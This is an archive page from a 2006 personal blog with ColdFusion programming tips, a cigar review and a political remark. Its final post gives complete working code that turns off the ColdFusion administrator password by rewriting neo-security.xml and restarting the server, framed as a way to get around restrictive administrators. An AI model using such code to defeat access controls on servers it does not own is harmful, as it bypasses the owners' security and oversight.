Aarrgghh!!

One guy's take on the web, programming, cigars, politics, Philadelphia, and whatever else comes to mind.

November 2006 Archives

Why Isn't There a Local Scope?

November 30, 2006

I was giving a presentation today on CFC's, and was explaining the difference between the variables scope, the 'local' scope, the this scope, and the arguments scope. It was incredibly hard to explain, mostly because an unscoped variable in a CFC function can refer to either a local, variable-scoped, or arguments-scoped variable.

It made me think, why didn't they just create another default scope named 'local'?

However, I realize the ColdFusion development team has some noggin-horsepower, so I'm sure there is a good reason. I just can't think of it.


November 30, 2006 Posted by Terrence Ryan at 3:13 PM

ColdFusion, Web Development,

Rocky Patel Vintage Connecticut 1999 Robusto

November 16, 2006

Country of Origin:Honduras
Length:5.5"
Ring:50
Type:
Flavor:full side of medium
Wrapper Type:Natural
Wrapper Tobacco:Connecticut Shade
Binder Tobacco:Nicaraguan
Filler Tobacco:Nicaraguan Dominican

Date Cigar Smoked:November 16, 2007
Cost for One:$6.50
Construction Rating:9
Taste Rating:8
Value Rating:8
Overall:8.3
Purchased At:Holt's Cigar Company
Tastes:cocca,cream
Notes:

Can Rockey Patel make a bad cigar? I bought this last week, but didn't smoke it until today. It kept well, and smoked like a dream. It's the first time in a very long time I've gotten the taste of cream from a cigar. It's in the same price range as Ashton, and Griffins, but I've got to say this might be better than both.


November 16, 2006 Posted by Terrence Ryan at 8:44 PM

Cigar Reviews, Cigars,

I'm a This-Scoping Fool

November 9, 2006

Hey, ColdFusion experts! Remember when you said "Just don't use the This scope in CFC's."?
And then I said "No, I can totally use it."
And then you said "No, you totally can't"
And then I was all like "I totally can!"
Yeah?
Well I was totally wrong.

(In case your wondering this conversation happened entirely in my head.)

We were having a weird issue with one of applications. It uses cookie based authentication that was written centrally into a cfc, and every once in awhile users were getting someone else information. We couldn't track it down. The CFC was all properly var scoped. However it turns out that it was using the This scope to return the results of each function. The CFC was instantiated in the application scope of the calling application. So things like this were happening:

  • User 1 authenticates.
  • Application.Obj.username is set to User1
  • User2 authenticates
  • Application.Obj.username is set to User2
  • User1 sets session.username to Application.Obj.username
  • User2 sets session.username to Application.Obj.username
  • Both are User2 in their session

This is dumb stuff from me. At the time I wrote it, like a year and a half ago, I assumed no one would instantiate the CFC to the application scope. But now time has proven me wrong. It just goes to show, that no matter how small your application is, or how narrowly you think it is going to be used, always follow best practices, unless you have a specific reason not to do so. If I had just set the proper response to be returned from the function instead of in the this scope, I wouldn't be rewriting code, and trying not to break existing calls to this central CFC in 20 or so applications by 10 or so different developers.


November 9, 2006 Posted by Terrence Ryan at 3:13 PM

ColdFusion, Web Development,

Don't Let the Man-On-Dog-Sex Hit You On Your Way Out

November 7, 2006

At last, I now feel 50% less ashamed saying "I grew up in New Jersey, but live in Pennsylvania."

Rick Santorum is no longer my Senator.

For those that don't understand Man-On-Dog-Sex thing.


November 7, 2006 Posted by Terrence Ryan at 11:42 PM

Philly, Politics,

Var Scoping ColdFusion Tag-Specific Variables

I came across this issue during a code review, and thought it might be of note. Specifically, use of cfstoredproc. StatusCode inspired this.

You know that rule about var scoping all variables called in a function unless they are specifically needed elsewhere? Well don't forget to do it to most of the "ColdFusion tag-specific variables." They are:

  • cfdirectory
  • cffile
  • cfftp
  • cfhttp
  • cfindex
  • cfldap
  • cfpop
  • cfquery
  • cfregistry
  • cfsearch
  • cfstoredproc

Anything that returns a simple value (string, numeric, Boolean, numeric) or an even arrays and queries can be var scoped at the head of the function with an empty string. (Although for every type but query I like to initialize it with the correct data type.) Structs however have to be initialized with a StructNew().

I omit from the list:

  • cfcatch
  • cferror

CFcatch only exists during the execution of a cfcatch block and is accessible only by code in that block. In any case, my normal test for variable scope leakage doesn't detect it, so I'm assuming it's a special case. If anyone knows different please let me know. Likewise CFerror only exists in page referenced by a cferror tag, which probably couldn't be in CFC call. (But I could be wrong.)


November 7, 2006 Posted by Terrence Ryan at 11:35 AM

ColdFusion, Web Development,

Hacking ColdFusion - Disable Administrator Security

November 2, 2006

During MAX 2006 I attended the ColdFusion CFC Birds of a Feather. Someone was complaining about the fact that their administrators were too restrictive despite not understanding the ColdFusion service. They were unable to see CFC introspection because of an administrator password. So I suggested they disable security programmatically.

After thinking about it for awhile, I decided that it was an interesting challenge. I looked at it a couple different ways, and finally settled on this solution: 

		
<!--- Grab the security file contents --->
<cffile action="read" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" variable="rawfilecontents" />

<!--- Convert it to a structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />

<!--- Change the setting ---> 
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />

<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />

<!--- Write it back to the disk.  --->
<cffile action="write" addnewline="yes" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" output="#fileToWrite#" fixnewline="no" />

<!--- This seems to restart the server eventually.  I had to rerun it several times to get it to work.  --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.ReStart() />

You have to run it a couple times before it kicks in.

Now, it is important to point out the following:

  1. If proper sandboxing is enabled, this won't work.
  2. If proper IIS restrictions on CFIDE\administrator are set, this won't work.
  3. You should never do this on a hosted server as it will probably violate your hosting agreement.
  4. I'm not advocating messing with your administrators.
  5. But you totally could.


November 2, 2006 Posted by Terrence Ryan at 12:28 AM

ColdFusion, Web Development,